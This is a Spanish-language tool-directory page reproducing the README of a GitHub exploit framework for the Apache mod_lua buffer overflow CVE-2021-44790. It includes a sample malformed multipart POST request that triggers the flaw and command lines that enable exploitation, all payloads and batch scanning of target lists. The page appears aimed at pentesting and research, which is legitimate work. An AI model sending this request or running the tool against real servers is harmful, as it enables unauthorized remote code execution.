Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Desbordamiento de búfer de Apache HTTP Server 2.4.x mod_lua (CVE-2021-44790): marco de explotación avanzado con huellas digitales, escaneo de múltiples etapas, arquitectura de complementos, informes profesionales, captura de pantalla, base de datos SQLite y detección con más del 95% de confianza. Autor: Sudeepa Wanigarathna. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Escáneres de Vulnerabilidades WebFrameworks de ExploitsExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Ver Repositorio
129hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Desbordamiento de búfer de Apache HTTP Server 2.4.x mod_lua (CVE-2021-44790): marco de explotación avanzado con huellas digitales, escaneo de múltiples etapas, arquitectura de complementos, informes profesionales, captura de pantalla, base de datos SQLite y detección con más del 95% de confianza. Autor: Sudeepa Wanigarathna.

Compartir

🔥 CVE-2021-44790 - Explotación de desbordamiento de búfer en Apache mod_lua

Version Python License CVE Apache CVSS Author


📋 Resumen

Apache mod_lua Buffer Overflow Exploitation es una plataforma de explotación avanzada de nivel empresarial para CVE-2021-44790, una vulnerabilidad crítica de desbordamiento de búfer en el módulo mod_lua de Apache HTTP Server 2.4.x. Este framework ofrece capacidades integrales de fingerprinting, descubrimiento inteligente de scripts, escaneo en múltiples etapas y generación profesional de informes con detección con más del 95% de confianza.

⚡ Características principales

CaracterísticaDescripción
🔍 Fingerprinting avanzadoDetección de versión de Apache, mod_lua, SO, arquitectura, WAF, CDN, contenedor y proveedor de nube
🎯 Descubrimiento inteligenteMás de 7 técnicas de descubrimiento, incluyendo robots.txt, sitemap, análisis de HTML y extracción de JavaScript
💥 Escaneo en múltiples etapasConexión → Fingerprint → Descubrimiento → Verificación → Explotación → Informes
🧩 Sistema de plugins extensibleDesarrollo sencillo de plugins para futuros CVEs
🌐 Motor HTTP inteligenteAgrupación de conexiones, reintentos, soporte HTTP/2 y limitación de velocidad
📊 Informes completosJSON, HTML, Markdown y PDF con paneles interactivos
🎨 Interfaz de terminal atractivaBiblioteca Rich con barras de progreso, tablas y salida codificada por colores
💾 Base de datos de investigaciónAlmacenamiento SQLite con historial completo de escaneos y soporte de consultas
📸 Captura de pantallasCapturas de pantalla automáticas de páginas web para la recopilación de evidencias
🚀 Alto rendimientoMás de 20 hilos concurrentes, más de 100 pools de conexiones

🎯 Detalles de la vulnerabilidad

AtributoValor
ID de CVECVE-2021-44790
VulnerabilidadDesbordamiento de búfer (subdesbordamiento de enteros)
Software afectadoApache HTTP Server 2.4.0 hasta 2.4.51
Versión corregidaApache HTTP Server 2.4.52 y posteriores
ComponenteMódulo mod_lua
Vector de ataqueRed (remoto)
Puntuación CVSS9.8 (Crítico)
Impacto de confidencialidadAlto
Impacto de integridadAlto
Impacto de disponibilidadAlto
Madurez del exploitPrueba de concepto disponible

Descripción técnica

La vulnerabilidad existe en el módulo mod_lua al procesar solicitudes multipart/form-data. Un subdesbordamiento de enteros en la función lua_request_parsebody() puede provocar un desbordamiento de búfer basado en montón, lo que potencialmente permite la ejecución remota de código.

POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 Capturas de pantalla

Interfaz principalResultados de fingerprint
Progreso del escaneoPanel del informe HTML

🚀 Inicio rápido

Instalación

# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

Uso básico

# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 Uso detallado

Opciones de línea de comandos

python3 exploit.py [TARGET] [OPTIONS]
OpciónDescripciónEjemplo
TARGETURL de destinohttp://target.com
--config FILEArchivo de configuración--config config.yaml
--threads NNúmero de hilos--threads 30
--timeout NTiempo de espera de la solicitud (segundos)--timeout 15
--proxy URLURL del proxy--proxy http://127.0.0.1:8080
--verboseSalida verbosa--verbose
--scan-onlyEscaneo sin explotación--scan-only
--exploitHabilitar explotación--exploit
--all-payloadsUsar todos los payloads--all-payloads
--report FORMATFormato de informe (json/html/markdown/all)--report all
--output DIRDirectorio de salida--output /path/to/reports/
--researchHabilitar modo de investigación--research
--database FILERuta de la base de datos--database luastorm.db
--screenshotTomar capturas de pantalla--screenshot
--batch FILEArchivo por lotes con objetivos--batch targets.txt
--query SQLEjecutar consulta a la base de datos--query "SELECT * FROM targets"

Ejemplos

1. Evaluación básica de vulnerabilidades

python3 exploit.py https://example.com --verbose --report all

2. Escaneo de entorno corporativo

python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. Prueba de penetración completa

python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. Escaneo por lotes

python3 exploit.py --batch targets.txt --config config.yaml

5. Consultas a la base de datos

# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ Configuración

config.yaml

Descargar herramienta